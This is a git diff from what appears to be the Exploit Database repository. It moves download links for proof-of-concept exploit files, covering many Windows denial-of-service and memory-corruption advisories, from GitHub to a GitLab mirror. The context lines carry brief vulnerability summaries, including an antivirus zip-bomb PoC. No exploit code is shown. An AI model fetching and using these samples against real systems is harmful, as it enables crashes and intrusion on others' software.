Attackers can exploit these issues to execute arbitrary code, cause denial-of-se These issues affect Ipswitch Instant Messaging 2.0.8.1; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31122.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31122.zip \ No newline at end of file diff --git a/exploits/windows/dos/312.txt b/exploits/windows/dos/312.txt index e581399a7..88cbaa74d 100644 --- a/exploits/windows/dos/312.txt +++ b/exploits/windows/dos/312.txt @@ -20,7 +20,7 @@ Then, in this situation the only alternate is to kill the process. --- [Proof of Concept] --- Please download this file. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/312.zip (av_bomb_3.zip) <--- For symantec. +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/312.zip (av_bomb_3.zip) <--- For symantec. The file contains, 'EICAR Test String' burried in 49647 directories. This is just a RAW 'proof of concept'. A few 100kb's of compressed file could be crafted in a way... NAV will take hours or MIGHT even days to complete the scan causing 100% cup use in email gateways for hours. The compressed archive must not necessarily be a '.zip' to trigger this attack. diff --git a/exploits/windows/dos/31300.txt b/exploits/windows/dos/31300.txt index 18911352a..282023aef 100644 --- a/exploits/windows/dos/31300.txt +++ b/exploits/windows/dos/31300.txt @@ -9,4 +9,4 @@ This issue affects the following: SurgeMail 38k4, beta 39a and earlier Netwin WebMail 3.1s and earlier -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31300.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31300.zip \ No newline at end of file diff --git a/exploits/windows/dos/31301.txt b/exploits/windows/dos/31301.txt index 0768961ab..05ecdab87 100644 --- a/exploits/windows/dos/31301.txt +++ b/exploits/windows/dos/31301.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary SurgeMail 38k4 and prior versions are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31301.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31301.zip \ No newline at end of file diff --git a/exploits/windows/dos/31310.txt b/exploits/windows/dos/31310.txt index fae60cc9a..be6fe5fca 100644 --- a/exploits/windows/dos/31310.txt +++ b/exploits/windows/dos/31310.txt @@ -11,4 +11,4 @@ OfficeScan Corporate Edition 7.0 Patch 3 Build 1314 and earlier Other Trend Micro products may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31310.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31310.zip \ No newline at end of file diff --git a/exploits/windows/dos/31330.txt b/exploits/windows/dos/31330.txt index 75e3b42c9..b9552f6c8 100644 --- a/exploits/windows/dos/31330.txt +++ b/exploits/windows/dos/31330.txt @@ -6,4 +6,4 @@ A successful exploit will allow remote attackers to execute arbitrary code in th These issues affect Borland VisiBroker Smart Agent 08.00.00.C1.03; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31330.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31330.zip \ No newline at end of file diff --git a/exploits/windows/dos/31338.txt b/exploits/windows/dos/31338.txt index 559248cb6..5193fb130 100644 --- a/exploits/windows/dos/31338.txt +++ b/exploits/windows/dos/31338.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to crash the affected application or cause These issues affect Perforce Server 2007.3; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31338.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31338.zip \ No newline at end of file diff --git a/exploits/windows/dos/31360.txt b/exploits/windows/dos/31360.txt index 82a2f022b..fb61eabbf 100644 --- a/exploits/windows/dos/31360.txt +++ b/exploits/windows/dos/31360.txt @@ -9,5 +9,5 @@ An attacker may leverage these issues to execute arbitrary code in the context o These issues affect MailEnable 3.13; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31360-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31360-2.pl \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31360-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31360-2.pl \ No newline at end of file diff --git a/exploits/windows/dos/31361.txt b/exploits/windows/dos/31361.txt index fffdbbb40..1dc35cbe9 100644 --- a/exploits/windows/dos/31361.txt +++ b/exploits/windows/dos/31361.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue by enticing a victim to open a malicious Of Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31361.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31361.tgz \ No newline at end of file diff --git a/exploits/windows/dos/31363.txt b/exploits/windows/dos/31363.txt index 01eb180f6..03afaa16d 100644 --- a/exploits/windows/dos/31363.txt +++ b/exploits/windows/dos/31363.txt @@ -4,4 +4,4 @@ Panda Internet Security/Antivirus+Firewall 2008 is prone to a vulnerability that Local users may exploit this vulnerability to cause a denial of service or to execute arbitrary code in the context of the kernel. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31363.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31363.rar \ No newline at end of file diff --git a/exploits/windows/dos/31381.txt b/exploits/windows/dos/31381.txt index 031dc14d4..df50dc597 100644 --- a/exploits/windows/dos/31381.txt +++ b/exploits/windows/dos/31381.txt @@ -4,4 +4,4 @@ Motorola Timbuktu Pro is prone to multiple denial-of-service vulnerabilities. Exploiting these issues will allow attackers to crash the affected application, denying further service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31381.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31381.zip \ No newline at end of file diff --git a/exploits/windows/dos/31399.txt b/exploits/windows/dos/31399.txt index 74654e5d8..217d3dc4f 100644 --- a/exploits/windows/dos/31399.txt +++ b/exploits/windows/dos/31399.txt @@ -7,4 +7,4 @@ McAfee Common Managemetn Agent 3.6.0.574 (Patch3) or earlier, McAfee Agent (MA) NOTE: This issue occurs only when the default debug level (7) is raised to 8. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31399.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31399.zip \ No newline at end of file diff --git a/exploits/windows/dos/31461.txt b/exploits/windows/dos/31461.txt index 723f07109..273450a8e 100644 --- a/exploits/windows/dos/31461.txt +++ b/exploits/windows/dos/31461.txt @@ -141,7 +141,7 @@ published as 'User release'. [1] http://www.postersw.com/. [2] http://www.coresecurity.com/system/files/attachments/2014/02/CORE-2014-0001-publish-it.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31461.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31461.zip 10. *About CoreLabs* diff --git a/exploits/windows/dos/31563.txt b/exploits/windows/dos/31563.txt index bbed94a57..c524dc80e 100644 --- a/exploits/windows/dos/31563.txt +++ b/exploits/windows/dos/31563.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to crash the application, resulting in denial SLMail Pro 6.3.1.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31563.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31563.zip \ No newline at end of file diff --git a/exploits/windows/dos/31629.txt b/exploits/windows/dos/31629.txt index 859189204..9dac86d62 100644 --- a/exploits/windows/dos/31629.txt +++ b/exploits/windows/dos/31629.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary Network Node Manager 7.53 running on Microsoft Windows is affected by this issue; other versions and platforms may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31629.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31629.zip \ No newline at end of file diff --git a/exploits/windows/dos/31696.txt b/exploits/windows/dos/31696.txt index d69476f0b..5dcf08b87 100644 --- a/exploits/windows/dos/31696.txt +++ b/exploits/windows/dos/31696.txt @@ -4,4 +4,4 @@ Computer Associates eTrust Secure Content Manager is prone to a remote denial-of An attacker can exploit this issue to crash the affected application, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31696.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31696.zip \ No newline at end of file diff --git a/exploits/windows/dos/31707.txt b/exploits/windows/dos/31707.txt index 28392d208..6297ba0c9 100644 --- a/exploits/windows/dos/31707.txt +++ b/exploits/windows/dos/31707.txt @@ -6,4 +6,4 @@ A remote attacker may exploit this issue to cause denial-of-service conditions. CA ARCserve Backup 12.0.5454.0 is affected by this issue; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31707.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31707.zip \ No newline at end of file diff --git a/exploits/windows/dos/31899.txt b/exploits/windows/dos/31899.txt index 78056840e..20406fbde 100644 --- a/exploits/windows/dos/31899.txt +++ b/exploits/windows/dos/31899.txt @@ -76,4 +76,4 @@ libmpgatofixed32_plugin+0x00000000000016b4 (Hash=0xf1ffd179.0x98f1d37c) 176efdb4 000003e8 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31899.avs \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31899.avs \ No newline at end of file diff --git a/exploits/windows/dos/31934.txt b/exploits/windows/dos/31934.txt index a9caaa9b0..0b351be2d 100644 --- a/exploits/windows/dos/31934.txt +++ b/exploits/windows/dos/31934.txt @@ -6,7 +6,7 @@ An attacker could exploit this issue by enticing a victim to open and interact w Successfully exploiting this issue will corrupt memory and crash the application. Given the nature of this issue, attackers may also be able to execute arbitrary code in the context of the currently logged-in user. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31934-1.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31934-2.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31934-3.doc -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31934-4.doc \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-1.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-2.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-3.doc +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31934-4.doc \ No newline at end of file diff --git a/exploits/windows/dos/32573.txt b/exploits/windows/dos/32573.txt index 95a82f49d..5ae611e9a 100644 --- a/exploits/windows/dos/32573.txt +++ b/exploits/windows/dos/32573.txt @@ -6,4 +6,4 @@ Attackers may exploit this issue to deny further service to legitimate users. This issue affects Windows 2003 and Windows Vista; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32573.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32573.zip \ No newline at end of file diff --git a/exploits/windows/dos/32939.txt b/exploits/windows/dos/32939.txt index bcb7ca097..239a6e3ea 100644 --- a/exploits/windows/dos/32939.txt +++ b/exploits/windows/dos/32939.txt @@ -6,4 +6,4 @@ Successfully exploits will crash the affected application, resulting in a denial OfficeScan 8.0 SP1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32939.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32939.zip \ No newline at end of file diff --git a/exploits/windows/dos/33056.pl b/exploits/windows/dos/33056.pl index 064f7025e..9752076ba 100755 --- a/exploits/windows/dos/33056.pl +++ b/exploits/windows/dos/33056.pl @@ -1,4 +1,4 @@ -# Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33056-sepm-secars-poc-v0.3.tar.gz +# Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33056-sepm-secars-poc-v0.3.tar.gz #!/usr/bin/perl -w # Exploit Title: Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC diff --git a/exploits/windows/dos/33707.txt b/exploits/windows/dos/33707.txt index ad61bf72a..e8628516e 100644 --- a/exploits/windows/dos/33707.txt +++ b/exploits/windows/dos/33707.txt @@ -4,4 +4,4 @@ Orb Networks Orb is prone to a denial-of-service vulnerability when handling mal Successfully exploiting this issue allows remote attackers to deny service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33707.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33707.zip \ No newline at end of file diff --git a/exploits/windows/dos/33710.txt b/exploits/windows/dos/33710.txt index 0a4345cbc..30c4b62c1 100644 --- a/exploits/windows/dos/33710.txt +++ b/exploits/windows/dos/33710.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th Media Jukebox 12 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33710.mp3 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33710.mp3 \ No newline at end of file diff --git a/exploits/windows/dos/33711.txt b/exploits/windows/dos/33711.txt index 130f00d42..5ed6148af 100644 --- a/exploits/windows/dos/33711.txt +++ b/exploits/windows/dos/33711.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to execute arbitrary code in the context of th BS.Player 2.51 Build 1022 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33711.mp3 \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33711.mp3 \ No newline at end of file diff --git a/exploits/windows/dos/33770.txt b/exploits/windows/dos/33770.txt index 9be2a8d4b..5d9ab2ffb 100644 --- a/exploits/windows/dos/33770.txt +++ b/exploits/windows/dos/33770.txt @@ -8,4 +8,4 @@ Windows Media Player 11 is vulnerable; other versions may also be affected. UPDATE (Mar 19, 2010): The vendor has not been able to replicate this issue. Pending further investigation, this BID will be updated and possibly retired. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33770.avi.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33770.avi.gz \ No newline at end of file diff --git a/exploits/windows/dos/33849.txt b/exploits/windows/dos/33849.txt index 77dd66bc1..95073462c 100644 --- a/exploits/windows/dos/33849.txt +++ b/exploits/windows/dos/33849.txt @@ -6,4 +6,4 @@ Exploiting this issue will cause the server to copy data to a NULL pointer, whic netKar PRO 1.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33849.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33849.zip \ No newline at end of file diff --git a/exploits/windows/dos/33977.txt b/exploits/windows/dos/33977.txt index 7faf94092..1e1b6fac2 100644 --- a/exploits/windows/dos/33977.txt +++ b/exploits/windows/dos/33977.txt @@ -6,4 +6,4 @@ An attacker with valid login credentials can exploit these issues to cause the a Torque 2D game engine and Torque 3D game engine are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33977.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33977.zip \ No newline at end of file diff --git a/exploits/windows/dos/3399.txt b/exploits/windows/dos/3399.txt index e4452af24..b9ac29dc2 100644 --- a/exploits/windows/dos/3399.txt +++ b/exploits/windows/dos/3399.txt @@ -74,7 +74,7 @@ void new_warning(int index, const char *fmt, ...) { =========== http://aluigi.org/poc/netrekfs.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3399.zip (03022007-netrekfs.zip) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3399.zip (03022007-netrekfs.zip) ####################################################################### diff --git a/exploits/windows/dos/34093.txt b/exploits/windows/dos/34093.txt index c6d14689e..0c875de78 100644 --- a/exploits/windows/dos/34093.txt +++ b/exploits/windows/dos/34093.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to cause the applications to become unrespo Battlefield 2 1.41 and Battlefield 2142 1.50 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34093.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34093.zip \ No newline at end of file diff --git a/exploits/windows/dos/34151.txt b/exploits/windows/dos/34151.txt index 0d7fcd901..4d6a11a31 100644 --- a/exploits/windows/dos/34151.txt +++ b/exploits/windows/dos/34151.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary code in the context of the Adobe SVG Viewer 3.03 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34151.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34151.rar \ No newline at end of file diff --git a/exploits/windows/dos/34158.txt b/exploits/windows/dos/34158.txt index a23f61eeb..05b33ddbf 100644 --- a/exploits/windows/dos/34158.txt +++ b/exploits/windows/dos/34158.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the affected server, resulting in de Chrome Engine version 4 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34158.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34158.zip \ No newline at end of file diff --git a/exploits/windows/dos/3419.txt b/exploits/windows/dos/3419.txt index 92a1bfd0b..48b689076 100644 --- a/exploits/windows/dos/3419.txt +++ b/exploits/windows/dos/3419.txt @@ -19,6 +19,6 @@ * Coded by Marsu <MarsupilamiPowa@hotmail.fr> * \*****************************************************************************/ -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3419.tar (03062007-Explorer_Crasher.tar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3419.tar (03062007-Explorer_Crasher.tar) # milw0rm.com [2007-03-06] \ No newline at end of file diff --git a/exploits/windows/dos/34227.txt b/exploits/windows/dos/34227.txt index 474f29ae7..8c1a6ef06 100644 --- a/exploits/windows/dos/34227.txt +++ b/exploits/windows/dos/34227.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to make the affected application unresponsive The issue affects Qt versions 4.6.3 and prior. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34227.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34227.zip \ No newline at end of file diff --git a/exploits/windows/dos/34251.txt b/exploits/windows/dos/34251.txt index 4cb123661..940b35902 100644 --- a/exploits/windows/dos/34251.txt +++ b/exploits/windows/dos/34251.txt @@ -11,4 +11,4 @@ Red Orchestra Darkest Hour: Europe '44-'45 Mare Nostrum -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34251.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34251.zip \ No newline at end of file diff --git a/exploits/windows/dos/34355.txt b/exploits/windows/dos/34355.txt index ffbc0a5c6..84d528391 100644 --- a/exploits/windows/dos/34355.txt +++ b/exploits/windows/dos/34355.txt @@ -4,4 +4,4 @@ Microsoft DirectX is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to interrupt existing sessions or crash or freeze the application that uses DirectX, resulting in denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34355.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34355.zip \ No newline at end of file diff --git a/exploits/windows/dos/34698.txt b/exploits/windows/dos/34698.txt index 51abef98a..b2b2103b3 100644 --- a/exploits/windows/dos/34698.txt +++ b/exploits/windows/dos/34698.txt @@ -4,4 +4,4 @@ Microsoft Excel is prone to a memory-corruption vulnerability. An attacker could exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34698.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34698.rar \ No newline at end of file diff --git a/exploits/windows/dos/35217.txt b/exploits/windows/dos/35217.txt index 1e85a63ee..0e3c8e7f2 100644 --- a/exploits/windows/dos/35217.txt +++ b/exploits/windows/dos/35217.txt @@ -48,4 +48,4 @@ Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5204.php PoC: - http://www.zeroscience.mk/codes/zsl_5204.rar - - https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35217.rar \ No newline at end of file + - https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35217.rar \ No newline at end of file diff --git a/exploits/windows/dos/35804.txt b/exploits/windows/dos/35804.txt index a63dc1326..a4b064759 100644 --- a/exploits/windows/dos/35804.txt +++ b/exploits/windows/dos/35804.txt @@ -8,4 +8,4 @@ NOTE: Remote code execution may be possible; however, this has not been confirme NetVault: SmartDisk versions 1.2.2 and prior are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35804.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35804.zip \ No newline at end of file diff --git a/exploits/windows/dos/35873.txt b/exploits/windows/dos/35873.txt index ef901771e..3945edd04 100644 --- a/exploits/windows/dos/35873.txt +++ b/exploits/windows/dos/35873.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to crash the application, resulting in a deni Wireshark 1.4.5 is vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35873.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35873.pcap \ No newline at end of file diff --git a/exploits/windows/dos/35895.txt b/exploits/windows/dos/35895.txt index 45e3d42cb..62354f09a 100644 --- a/exploits/windows/dos/35895.txt +++ b/exploits/windows/dos/35895.txt @@ -6,7 +6,7 @@ Attackers can exploit this issue to cause the server to dereference an invalid m RealityServer Web Services 3.1.1 build 144525.5057 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35895.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35895.zip diff --git a/exploits/windows/dos/36128.txt b/exploits/windows/dos/36128.txt index f1b39c2cc..f5f38463a 100644 --- a/exploits/windows/dos/36128.txt +++ b/exploits/windows/dos/36128.txt @@ -6,4 +6,4 @@ Successful exploits may allow attackers to crash the affected application, denyi Wireshark 1.4.0 to 1.4.8 and 1.6.0 to 1.6.1 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36128.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36128.pcap \ No newline at end of file diff --git a/exploits/windows/dos/36211.txt b/exploits/windows/dos/36211.txt index 9facf9501..f9d833dd5 100644 --- a/exploits/windows/dos/36211.txt +++ b/exploits/windows/dos/36211.txt @@ -4,4 +4,4 @@ Microsoft Host Integration Server is prone to a remote denial-of-service vulnera An attacker can exploit this issue to cause the application to become unresponsive or to crash, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36211.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36211.zip \ No newline at end of file diff --git a/exploits/windows/dos/36334.txt b/exploits/windows/dos/36334.txt index 00568075f..33b195ec9 100644 --- a/exploits/windows/dos/36334.txt +++ b/exploits/windows/dos/36334.txt @@ -63,7 +63,7 @@ An error when handling LZWMinimumCodeSize can be exploited to cause memory corru =========== http://protekresearchlab.com/exploits/PRL-2015-01.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36334.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36334.gif ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/36335.txt b/exploits/windows/dos/36335.txt index 5b68b437f..a350536f4 100644 --- a/exploits/windows/dos/36335.txt +++ b/exploits/windows/dos/36335.txt @@ -63,6 +63,6 @@ An error when handling the Size member of a GIF DataSubBlock data structure can =========== http://protekresearchlab.com/exploits/PRL-2015-02.gif -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36335.gif +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36335.gif ############################################################################### \ No newline at end of file diff --git a/exploits/windows/dos/36336.txt b/exploits/windows/dos/36336.txt index d880caa15..69650b70f 100644 --- a/exploits/windows/dos/36336.txt +++ b/exploits/windows/dos/36336.txt @@ -67,7 +67,7 @@ An unspecified error in Windows Text Services can be exploited to cause memory c This file need to be open in wordpad. http://protekresearchlab.com/exploits/PRL-2015-03.rar -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36336.rar +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36336.rar ############################################################################### Search for: \ No newline at end of file diff --git a/exploits/windows/dos/36405.txt b/exploits/windows/dos/36405.txt index 88d6cd775..291086700 100644 --- a/exploits/windows/dos/36405.txt +++ b/exploits/windows/dos/36405.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to perform denial-of-service attacks or gain Serv-U 11.1.0.3 and prior versions are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36405.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36405.zip \ No newline at end of file diff --git a/exploits/windows/dos/36443.txt b/exploits/windows/dos/36443.txt index 51ec68e5e..b459054f5 100644 --- a/exploits/windows/dos/36443.txt +++ b/exploits/windows/dos/36443.txt @@ -8,4 +8,4 @@ Note: The impact of the unspecified vulnerability is not known. We will update t Versions prior to Opera Web Browser 11.60 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36443.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36443.zip \ No newline at end of file diff --git a/exploits/windows/dos/36788.txt b/exploits/windows/dos/36788.txt index d6d25285f..0b31aeccc 100644 --- a/exploits/windows/dos/36788.txt +++ b/exploits/windows/dos/36788.txt @@ -64,4 +64,4 @@ Successful exploitation may allow execution of arbitrary code. =========== http://protekresearchlab.com/exploits/PRL-2015-04.docx -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36788.docx \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36788.docx \ No newline at end of file diff --git a/exploits/windows/dos/3690.txt b/exploits/windows/dos/3690.txt index 95973bf97..0f78668b7 100644 --- a/exploits/windows/dos/3690.txt +++ b/exploits/windows/dos/3690.txt @@ -26,7 +26,7 @@ file613-1.doc - Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100 %, a These files can be found at http://www.offensive-security.com/0day/0day.tar.gz -backup: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3690.tar.gz (04092007-0day.tar.gz) +backup: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3690.tar.gz (04092007-0day.tar.gz) Be safe, diff --git a/exploits/windows/dos/3693.txt b/exploits/windows/dos/3693.txt index cece935a2..ea112342e 100644 --- a/exploits/windows/dos/3693.txt +++ b/exploits/windows/dos/3693.txt @@ -1,5 +1,5 @@ MS Windows .HLP File Local HEAP Overflow PoC 0day -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/3693.hlp.tgz (04092007-evil1.hlp.tgz) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3693.hlp.tgz (04092007-evil1.hlp.tgz) # milw0rm.com [2007-04-09] \ No newline at end of file diff --git a/exploits/windows/dos/37346.txt b/exploits/windows/dos/37346.txt index 918cb28f6..40b4ed5ad 100644 --- a/exploits/windows/dos/37346.txt +++ b/exploits/windows/dos/37346.txt @@ -69,6 +69,6 @@ An error when handling LZWMinimumCodeSize can be exploited to cause an heap memo =========== http://protekresearchlab.com/exploits/PRL-2015-06.gif 